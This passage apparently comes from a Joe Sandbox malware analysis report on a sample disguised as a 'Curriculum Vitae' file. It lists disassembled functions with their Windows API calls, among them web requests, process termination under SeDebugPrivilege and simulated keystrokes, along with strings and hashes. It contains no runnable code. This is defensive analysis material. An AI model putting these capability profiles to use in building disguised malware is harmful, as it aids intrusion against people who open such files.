                      • SetWindowLongW.USER32(?,000000EB), ref: 00D35C7A
                        • Part of subcall function 00D35D0A: GetClientRect.USER32(?,?), ref: 00D35D30
                        • Part of subcall function 00D35D0A: GetWindowRect.USER32(?,?), ref: 00D35D71
                        • Part of subcall function 00D35D0A: ScreenToClient.USER32(?,?), ref: 00D35D99
                      • GetDC.USER32 ref: 00D746F5
                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D74708
                      • SelectObject.GDI32(00000000,00000000), ref: 00D74716
                      • SelectObject.GDI32(00000000,00000000), ref: 00D7472B
                      • ReleaseDC.USER32(?,00000000), ref: 00D74733
                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D747C4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                      • String ID: U
                      • API String ID: 4009187628-3372436214
                      • Opcode ID: bef4d3dd663e405576cad8712b9f15609237bb4316d871a3783f07ba8ed2ea84
                      • Instruction ID: 28c0de714c90962a12872fbd92b35552196a213212dfc41bce69f02ac4fc9947
                      • Opcode Fuzzy Hash: bef4d3dd663e405576cad8712b9f15609237bb4316d871a3783f07ba8ed2ea84
                      • Instruction Fuzzy Hash: 2771C331400205DFCF268F64C984AFA7BB5FF46354F188269E9995A26AD731D841DFB0
                      Function 00DA359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                      Download Yara Rule
                      APIs
                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DA35E4
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • LoadStringW.USER32(00E02390,?,00000FFF,?), ref: 00DA360A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LoadString$_wcslen
                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 4099089115-2391861430
                      • Opcode ID: 3b22094cc59731d5a13db89f7c3d840544b85868cbeadcf8ca3dbb6fffe54615
                      • Instruction ID: 8719053aa376a117f6828fff84ded2c5c1bad3be660acfe6143d84c758a87f7b
                      • Opcode Fuzzy Hash: 3b22094cc59731d5a13db89f7c3d840544b85868cbeadcf8ca3dbb6fffe54615
                      • Instruction Fuzzy Hash: 62515D7180020ABBDF15EBA4CD52EEEBB79EF05300F145165F205721A1EB715A99DFB0
                      Function 00DAC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DAC272
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DAC29A
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DAC2CA
                      • GetLastError.KERNEL32 ref: 00DAC322
                      • SetEvent.KERNEL32(?), ref: 00DAC336
                      • InternetCloseHandle.WININET(00000000), ref: 00DAC341
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                      • String ID:
                      • API String ID: 3113390036-3916222277
                      • Opcode ID: f82f7153cef4bfc4d4268f850ba199c0070269a251e18316a4327fe525aff6c6
                      • Instruction ID: 6270b10b671975a8d280393ee9e781ad3315321284bb2b06bdbb8c08b755d8e8
                      • Opcode Fuzzy Hash: f82f7153cef4bfc4d4268f850ba199c0070269a251e18316a4327fe525aff6c6
                      • Instruction Fuzzy Hash: A9319171510305AFDB219F648C88E6B7BFCEB4A750F14951DF48AD2250DB34DD059B74
                      Function 00D9989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D73AAF,?,?,Bad directive syntax error,00DCCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00D998BC
                      • LoadStringW.USER32(00000000,?,00D73AAF,?), ref: 00D998C3
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00D99987
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HandleLoadMessageModuleString_wcslen
                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                      • API String ID: 858772685-4153970271
                      • Opcode ID: 5d53eb419cbae6f2d8551a2cf66e499800de18479ba4839dcb3483c516e23b11
                      • Instruction ID: 81cdaf50f29e54c6685ff0ec34d0244a037708098ad9dcafade058667cd799cd
                      • Opcode Fuzzy Hash: 5d53eb419cbae6f2d8551a2cf66e499800de18479ba4839dcb3483c516e23b11
                      • Instruction Fuzzy Hash: 69215E3184421EBBCF15AF94CC16EEEB775FF18300F049459F619660A2EB719618DB70
                      Function 00D9209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32 ref: 00D920AB
                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00D920C0
                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D9214D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassMessageNameParentSend
                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                      • API String ID: 1290815626-3381328864
                      • Opcode ID: 21df79266281644e098cc8f76d1c07c112a1b934f79fdbdfa6e983d6cb15773e
                      • Instruction ID: 25aba6a8aabafc95e6fb08311d45790df247909ad4ffdd63a263dc34f98a3f5b
                      • Opcode Fuzzy Hash: 21df79266281644e098cc8f76d1c07c112a1b934f79fdbdfa6e983d6cb15773e
                      • Instruction Fuzzy Hash: 8F1106766C870BBAFF112220EC0BDB6379CCB05329F214116FF08B50E5EA61A85A5634
                      Function 00D6CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                      • String ID:
                      • API String ID: 1282221369-0
                      • Opcode ID: 06cf899d4e10863f1ca137d55d447d3c8d0cfc3bf52276a842fa1a6a6049288e
                      • Instruction ID: 1faa38f59612ce919f1159f82dda1820a9a37ee5487e4482250e51f085bce5cc
                      • Opcode Fuzzy Hash: 06cf899d4e10863f1ca137d55d447d3c8d0cfc3bf52276a842fa1a6a6049288e
                      • Instruction Fuzzy Hash: 68613871A06301AFDF25EFB49881B7A7BA6EF45350F08416DF985E7282DB329D4187B0
                      Function 00D48B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00D86890
                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00D868A9
                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D868B9
                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00D868D1
                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D868F2
                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D48874,00000000,00000000,00000000,000000FF,00000000), ref: 00D86901
                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D8691E
                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D48874,00000000,00000000,00000000,000000FF,00000000), ref: 00D8692D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                      • String ID:
                      • API String ID: 1268354404-0
                      • Opcode ID: cfef7c794609a5d7aee8854bab21001c3fd521b6faad17e047dc94e0963c481d
                      • Instruction ID: d7e4864ee3a35a2d2439c9253136de2d28cd4957758782f64884ac3e8dc1aa82
                      • Opcode Fuzzy Hash: cfef7c794609a5d7aee8854bab21001c3fd521b6faad17e047dc94e0963c481d
                      • Instruction Fuzzy Hash: 04516970A0020AEFDB20DF25CC95FAA7BB5EB48760F144518F956A72E0DB71E990DB60
                      Function 00DAC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DAC182
                      • GetLastError.KERNEL32 ref: 00DAC195
                      • SetEvent.KERNEL32(?), ref: 00DAC1A9
                        • Part of subcall function 00DAC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DAC272
                        • Part of subcall function 00DAC253: GetLastError.KERNEL32 ref: 00DAC322
                        • Part of subcall function 00DAC253: SetEvent.KERNEL32(?), ref: 00DAC336
                        • Part of subcall function 00DAC253: InternetCloseHandle.WININET(00000000), ref: 00DAC341
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                      • String ID:
                      • API String ID: 337547030-0
                      • Opcode ID: ebe80fb9986ea4bf3205b1b8176f85fd2bc7cafc1e6b652694c5ea7850d4ba5c
                      • Instruction ID: 04ed7262c282d9eca7bd14284f9a2a968a6a734385cae9084718b00858da57ce
                      • Opcode Fuzzy Hash: ebe80fb9986ea4bf3205b1b8176f85fd2bc7cafc1e6b652694c5ea7850d4ba5c
                      • Instruction Fuzzy Hash: 7B31AE71221706AFDB219FA5DD04B66BBF8FF1A320B04641DFA5AC6610D731E810DBB4
                      Function 00D925A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D93A57
                        • Part of subcall function 00D93A3D: GetCurrentThreadId.KERNEL32 ref: 00D93A5E
                        • Part of subcall function 00D93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D925B3), ref: 00D93A65
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D925BD
                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D925DB
                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00D925DF
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D925E9
                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D92601
                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00D92605
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00D9260F
                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D92623
                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00D92627
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                      • String ID:
                      • API String ID: 2014098862-0
                      • Opcode ID: c86bbeb0331835b461c13c26c9a5602cc48dbbaac7ef592d8180fd10522891c5
                      • Instruction ID: 0a95adaf2a9208ae40e8b6ba972efb25392c5e47fd44f6f1ead1ee629811f216
                      • Opcode Fuzzy Hash: c86bbeb0331835b461c13c26c9a5602cc48dbbaac7ef592d8180fd10522891c5
                      • Instruction Fuzzy Hash: CC01D4307A0311BBFB1067699C8AF593F59DB5EB12F111001F358EE2E1C9E264458AB9
                      Function 00D91803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00D91449,?,?,00000000), ref: 00D9180C
                      • HeapAlloc.KERNEL32(00000000,?,00D91449,?,?,00000000), ref: 00D91813
                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D91449,?,?,00000000), ref: 00D91828
                      • GetCurrentProcess.KERNEL32(?,00000000,?,00D91449,?,?,00000000), ref: 00D91830
                      • DuplicateHandle.KERNEL32(00000000,?,00D91449,?,?,00000000), ref: 00D91833
                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D91449,?,?,00000000), ref: 00D91843
                      • GetCurrentProcess.KERNEL32(00D91449,00000000,?,00D91449,?,?,00000000), ref: 00D9184B
                      • DuplicateHandle.KERNEL32(00000000,?,00D91449,?,?,00000000), ref: 00D9184E
                      • CreateThread.KERNEL32(00000000,00000000,00D91874,00000000,00000000,00000000), ref: 00D91868
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                      • String ID:
                      • API String ID: 1957940570-0
                      • Opcode ID: 5dd5bb87070a4a95834f900f380830749059b7fae03b88bf3f16d902fc8754c3
                      • Instruction ID: ea85d310045cba495e7e0a680f69ce26346e224a6b954b20c7807d34cb9251df
                      • Opcode Fuzzy Hash: 5dd5bb87070a4a95834f900f380830749059b7fae03b88bf3f16d902fc8754c3
                      • Instruction Fuzzy Hash: 9B01BFB5250345BFE710ABA6DC4DF5B3B6CEB89B11F045411FB05DB291C6749800CB30
                      Function 00DBA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D9D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00D9D501
                        • Part of subcall function 00D9D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00D9D50F
                        • Part of subcall function 00D9D4DC: CloseHandle.KERNEL32(00000000), ref: 00D9D5DC
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DBA16D
                      • GetLastError.KERNEL32 ref: 00DBA180
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DBA1B3
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DBA268
                      • GetLastError.KERNEL32(00000000), ref: 00DBA273
                      • CloseHandle.KERNEL32(00000000), ref: 00DBA2C4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                      • String ID: SeDebugPrivilege
                      • API String ID: 2533919879-2896544425
                      • Opcode ID: e5c1b5000dd09b1210758ea9dd66577977f9fe461b23a67223b3b1d666f05a20
                      • Instruction ID: 75fbfcf95ae93919d6202487f905eb45e834cfa4aa42726e2f486c5bf5d2b969
                      • Opcode Fuzzy Hash: e5c1b5000dd09b1210758ea9dd66577977f9fe461b23a67223b3b1d666f05a20
                      • Instruction Fuzzy Hash: 07618E34204242EFD720DF19C494F55BBE1AF44318F18849CE46A8BBA3C772ED45CBA2
                      Function 00DC3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DC3925
                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00DC393A
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DC3954
                      • _wcslen.LIBCMT ref: 00DC3999
                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DC39C6
                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DC39F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$Window_wcslen
                      • String ID: SysListView32
                      • API String ID: 2147712094-78025650
                      • Opcode ID: 4ab4f9310ffc53614ba93bd769c581b30f43548e3c2b25da578865e331fb8f4d
                      • Instruction ID: 41c429da3913cce829e84751a80eb1877b51188aceba66079794fcc556d33e85
                      • Opcode Fuzzy Hash: 4ab4f9310ffc53614ba93bd769c581b30f43548e3c2b25da578865e331fb8f4d
                      • Instruction Fuzzy Hash: F141B231A0031AABDF219F64CC45FEA77A9EF08350F14452AF958E7291D771DA84CBB0
                      Function 00D9BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D9BCFD
                      • IsMenu.USER32(00000000), ref: 00D9BD1D
                      • CreatePopupMenu.USER32 ref: 00D9BD53
                      • GetMenuItemCount.USER32(016E75E0), ref: 00D9BDA4
                      • InsertMenuItemW.USER32(016E75E0,?,00000001,00000030), ref: 00D9BDCC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                      • String ID: 0$2
                      • API String ID: 93392585-3793063076
                      • Opcode ID: 4f27d6f48072e813b0d3165092925bc62b3883a24c5511578764cca0de9dc7d8
                      • Instruction ID: 3a5c21a1bdf2e8a118d009b358c44b72a27ce96946e780e6ad40e71dd9ef1ef9
                      • Opcode Fuzzy Hash: 4f27d6f48072e813b0d3165092925bc62b3883a24c5511578764cca0de9dc7d8
                      • Instruction Fuzzy Hash: 7651BF70A003099BDF10DFA8EA88BAEBBF4FF45324F19415AE546D7290E7709945CB71
                      Function 00D9C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadIconW.USER32(00000000,00007F03), ref: 00D9C913
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: IconLoad
                      • String ID: blank$info$question$stop$warning
                      • API String ID: 2457776203-404129466
                      • Opcode ID: 295a022eaa994606715ff0514be7ac6844719ef0426aaa4865126246ac95dfe8
                      • Instruction ID: 37d09b07ddc2b5d8eed7e4094068b1aa22f46e81d3d31eba10b3b775729342c0
                      • Opcode Fuzzy Hash: 295a022eaa994606715ff0514be7ac6844719ef0426aaa4865126246ac95dfe8
                      • Instruction Fuzzy Hash: B7112B3169930BBEAF046B149C82CAA779CDF1531EB20502AF904A6282D760DD445775
                      Function 00D9ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$LocalTime
                      • String ID:
                      • API String ID: 952045576-0
                      • Opcode ID: 559aab8918db1a8d1967b5bdcbdd4dcd79e76da7a6827c5393fe25db86fb33e6
